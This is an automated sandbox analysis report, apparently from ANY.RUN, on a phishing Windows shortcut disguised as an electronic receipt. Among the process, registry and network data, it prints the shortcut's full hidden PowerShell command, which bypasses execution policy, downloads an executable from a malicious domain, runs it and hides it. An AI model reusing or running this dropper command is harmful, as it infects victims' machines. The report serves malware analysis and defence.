File name:

6d4a8433e9b97e2bf48954c95ee1683c29212e353d488397a4ad5f0c31ba260a.lnk

Full analysis: https://app.any.run/tasks/e828bf19-b58a-40d7-8193-b48755f4418e
Verdict: Malicious activity
Analysis date: November 27, 2024, 05:11:40
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
phishing
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Unicoded, HasExpIcon "%SystemRoot%\system32\dssec.dat", length=0, window=normal, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

037C9D9ABB7AD9BA9CA1862B18DA7EA0

SHA1:

2B7F50C215B8460919C558CF879A411E733AF78E

SHA256:

6D4A8433E9B97E2BF48954C95EE1683C29212E353D488397A4AD5F0C31BA260A

SSDEEP:

48:8pTX1e3ztgsaOE+gWqEBi+GtF952ozQe:8pJjbdoipr2B

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6196)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6196)

    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2192)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6196)

    • Checks proxy server information

      • powershell.exe (PID: 6196)

    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6196)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6196)

    • Manual execution by a user

      • msedge.exe (PID: 5320)

    • Application launched itself

      • msedge.exe (PID: 5320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Normal
HotKey: (none)
TargetFileDOSName: powershell.exe
Description: Type: Electronic Receipt
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command dssec.dat;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/tdtyhrxf/dfhsrarytrsagerfwearfwerfwerthdyttyfuiuoifjcghhbg/srtserytdjufyuudftdrgtestytdtedrtgserwegtraegryetraweg/nezfdio.exe','rotjewv.exe');./'rotjewv.exe';(get-item 'rotjewv.exe').Attributes += 'Hidden';
IconFileName: c:\windows\system32\dssec.dat
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
169
Monitored processes
39
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs #PHISHING svchost.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
648"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6760 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1076"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6816 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1172"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6728 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1200"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6424 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1228"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6988 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1468"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5820 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2040"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5596 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2120"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=136 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.59\identity_helper.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
PWA Identity Proxy Host
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\identity_helper.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2212"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3848 --field-trial-handle=2520,i,948819214728159681,8847337674174683681,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
12 546
Read events
12 525
Write events
21
Delete events
0

Modification events

(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(5320) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
0360545174862F00
(PID) Process:(5320) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation:writeName:S-1-5-21-1693682860-607145093-2874071422-1001
Value:
00835C5174862F00
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328198
Operation:writeName:WindowTabManagerFileMappingId
Value:
{25E8423B-BFD8-4F10-9BF0-124DCE033E12}
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328198
Operation:writeName:WindowTabManagerFileMappingId
Value:
{3921B094-0E6B-468C-8254-4EF1729DB080}
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328198
Operation:writeName:WindowTabManagerFileMappingId
Value:
{0525C9D8-8A17-44DF-B3B5-602F0656C0DB}
(PID) Process:(5320) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\328198
Operation:writeName:WindowTabManagerFileMappingId
Value:
{517AA321-10B8-41D5-9093-E95B65D228F6}
Executable files
7
Suspicious files
581
Text files
139
Unknown types
4

Dropped files

PID
Process
Filename
Type
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF157875.TMP
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF157875.TMP
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF157885.TMP
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG.old~RF157866.TMPtext
MD5:92941BAD29B823669F85E6F7352F04EB
SHA256:19E674BF425E68E8B1C1242017BB22044BA558B1D5644F5D4EBA973AF39BABAA
5320msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old~RF157866.TMPtext
MD5:C5C8E14929BCE261B2B5B899CB479AF7
SHA256:73DBFF8A366CFF6972A38C091782EF62C89E28FDA1423A47448A60343F921754
6196powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DBMJ3VN7U165OY98FEE8.tempbinary
MD5:2B1D158326783935964882A74815D185
SHA256:AB63BE6067BFFD2DE4506EC488325021A1D7A424A99B319AF31EE1A13E7E9F51
6196powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:69F59F9D8E4B43367035A388C48A3435
SHA256:D9248DCA2DD88B7BF711C22142D6076E6C616C661D03E62A7193BF6BE8F00643
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
29
TCP/UDP connections
107
DNS requests
132
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.216.77.23:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2160
svchost.exe
GET
200
23.216.77.23:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2160
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7136
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5920
msedge.exe
GET
304
23.192.153.142:80
http://x1.i.lencr.org/
unknown
whitelisted
6388
svchost.exe
HEAD
200
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/8e66c1e5-210a-491f-9c6d-8c3fc4d9c3eb?P1=1733008901&P2=404&P3=2&P4=iB87RasznyQLUZ5Gbc0yYxRYL8NU0ZE6NOr2kjy80ArrpxWW6R7AS%2fXQVw0OOET5JZ1DQvxYaRdTEuEXXXiI3A%3d%3d
unknown
whitelisted
5920
msedge.exe
GET
304
23.192.153.142:80
http://r3.i.lencr.org/
unknown
whitelisted
6388
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/8e66c1e5-210a-491f-9c6d-8c3fc4d9c3eb?P1=1733008901&P2=404&P3=2&P4=iB87RasznyQLUZ5Gbc0yYxRYL8NU0ZE6NOr2kjy80ArrpxWW6R7AS%2fXQVw0OOET5JZ1DQvxYaRdTEuEXXXiI3A%3d%3d
unknown
whitelisted
6388
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/8e66c1e5-210a-491f-9c6d-8c3fc4d9c3eb?P1=1733008901&P2=404&P3=2&P4=iB87RasznyQLUZ5Gbc0yYxRYL8NU0ZE6NOr2kjy80ArrpxWW6R7AS%2fXQVw0OOET5JZ1DQvxYaRdTEuEXXXiI3A%3d%3d
unknown
whitelisted
6388
svchost.exe
GET
206
199.232.210.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/8e66c1e5-210a-491f-9c6d-8c3fc4d9c3eb?P1=1733008901&P2=404&P3=2&P4=iB87RasznyQLUZ5Gbc0yYxRYL8NU0ZE6NOr2kjy80ArrpxWW6R7AS%2fXQVw0OOET5JZ1DQvxYaRdTEuEXXXiI3A%3d%3d
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
23.216.77.23:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2160
svchost.exe
23.216.77.23:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2160
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
104.126.37.154:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.216.77.23
  • 23.216.77.21
  • 23.216.77.25
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 104.126.37.154
  • 104.126.37.176
  • 104.126.37.162
  • 104.126.37.130
  • 104.126.37.163
  • 104.126.37.123
  • 104.126.37.171
  • 104.126.37.128
  • 104.126.37.131
  • 104.126.37.186
  • 104.126.37.153
  • 104.126.37.136
  • 104.126.37.137
  • 104.126.37.155
  • 104.126.37.178
  • 104.126.37.160
  • 2.23.209.179
  • 2.23.209.130
  • 2.23.209.133
  • 2.23.209.187
  • 2.23.209.185
  • 2.23.209.182
  • 2.23.209.176
  • 2.23.209.189
  • 2.23.209.140
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.68
  • 20.190.159.0
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.67
  • 40.126.31.69
  • 20.190.159.2
whitelisted
go.microsoft.com
  • 23.218.210.69
  • 184.28.89.167
whitelisted
www.sodiumlaurethsulfatedesyroyer.com
  • 188.114.96.3
  • 188.114.97.3
malicious
arc.msn.com
  • 20.103.156.88
  • 20.31.169.57
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Suspected Malicious Domain by Cloudflare (www .sodiumlaurethsulfatedesyroyer .com)
5920
msedge.exe
Potentially Bad Traffic
ET DNS Query for .cc TLD
5920
msedge.exe
Misc activity
SUSPICIOUS [ANY.RUN] Tracking Service (.popin .cc)
5920
msedge.exe
Misc activity
SUSPICIOUS [ANY.RUN] Tracking Service (.popin .cc)
5920
msedge.exe
Potentially Bad Traffic
ET DNS Query for .cc TLD
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
6d4a8433e9b97e2bf48954c95ee1683c29212e353d488397a4ad5f0c31ba260a.lnk